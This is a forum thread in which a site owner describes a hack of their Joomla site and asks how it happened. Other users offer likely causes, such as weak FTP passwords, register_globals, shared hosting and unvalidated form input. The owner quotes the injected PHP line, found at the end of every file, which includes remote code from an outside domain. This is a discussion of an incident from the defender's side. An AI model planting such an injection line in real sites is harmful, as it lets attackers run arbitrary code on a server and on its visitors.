looked like a movie to me.
10pm and i just wanted to check my site stats b4 going to bed.
Pages on my site all displayed blank! like an empty index.html file.
I quickly tried other browsers in case chrome had started messing up, the other four browsers displayed same! I thought it was my host so i typed in url of some of my clients that i hosted on same server, they are all displaying fine.

I don die today! kia, i launch ftp client and begin view my source code. This is what i saw:
the code below was appended to the end of every php file on my site

<?php echo '<?php include 'http://the-first-five-pages.com/code.html'; ?>'; ?>

I immediately checked my remote backup location for my database backups. the last one was just 5 hours ago. i checked my site logs and my filesystem remote backup location and they were all updated today. Thank God! i wont loose much. I immediately restored filesystem from the file backups and dropped databases and recreated them from the sql backups. My site was up again by 1:27am www.afrisoft.org . Thanks to auto-backup scripts, i would have been sent back in time.

To prevent future occurences like this, can anyone in here tell me how an outsider got to modify my php files? Pls how can i guard against such in the future? is there something i enabled?

This one na serious matterz o!

They got in through a backdoor you created obviously. For example, how are you guarding against SQL injections> How do you capture your form fields? Good thing is, you have backups.

Nitation, a fellow forumite is pretty good at this stuff and I am sure wouldn't mind sharing with us all strategies to prevent such hacking.

@ Poster,

It will be very difficult for anyone to say exactly how or why your system (website) was compromised. In this situation, there are numerous reasons attached to it:

a) You might have chosen a simple or dictionary password for your ftp credentials. An attacker could use different brute force programs to guess what your ftp password is, since the username is very easy to discover. Or you have your password saved in an environment where anyone can make use of it.

b) You have developed an application that relies on register_globals to be ON

c) Your hosting company's account was compromised and you were affected.

d) Since you're on a shared hosting, you will observe that you're not the only one on the server. If domain X is vulnerable, an intelligent attacker could pose threat to you on domain Y.

e) You have a page/file(s) that allows remote files to be included without proper check. eg-> shell access

and so forth. You should contact a professional to scan, test and secure your application from further threat.

NB: You may also post your log file, let us examine it.

@ Yawatide: Thank you for the recommendation, it's highly appreciated!

Regards

- nitation

Thanks nitation. My site was hosted on joomla 1.5.

a. My password has no english meaning and contains numbers. This is because i'm well aware of brute forcing.
b. i do not have access to php.ini so i had used .htaccess to set register globals to off.
c. This is very likely.
d. This is also very likely
e. No. i dont

@ yawatide
Though i disabled user registration on my site, after reading your post, i realise i left some forms i manually coded into joomla vunerable to code injection _{(How careless?)}. I've tidied that up now and i'll cross check all nitation's points again.

I tried to google the appended code but found nothing on it.
Thanks guys. if there's more i shd know, pls its welcome.

Hmm, not that I trust joomla and/or its installable components 100% but I would imagine that if they went through the trouble to code a registration form, then they made sure, for legal reasons, that it is as secure as possible. What did you need done that required a custom registration form?

Depending on what you need done with your form, maybe you should try, if not already, the free component, Community Builder. I recently used it on a project and it is powerful from what I can tell. For one, it allowed me to define my own registration questions (like date of birth, year of graduation, etc) which is better than the (boring) registration form that comes standard with joomla.

I hope this helps.

Pls,how can i open two different yahoo id on explorer 8 at the same time. I can do that on 7 but explorer 8 seems difficult as it keeps opening the same id leaving me to sign out before opening another id

I used the forms (2 to be specific) for online activation of my commercial software.

The form validates your product/registration key from my db (not joomla db) and then gives you an activation code to unlock the shareware. It also integrates with 2 sms APIs to send an sms containing your activation code to ur phone.

It checks the return value upon sending through the first api. if sending fails, it uses the second to send the sms.

i'm not sure i can achieve this with joomla components or modules so i just coded them myself.

I'll try out Community Builder for some other forms i wanna create.

The form validates your product/registration key from my db (not joomla db) and then gives you an activation code to unlock the shareware. It also integrates with 2 sms APIs to send an sms containing your activation code to ur phone.

This is probably the problem. There might be tutorials online featuring how to keep non-joomla DBs secure on joomla sites or maybe even components/modules to that effect. You probably already know this but just in case, visit extensions.joomla.org

Good luck!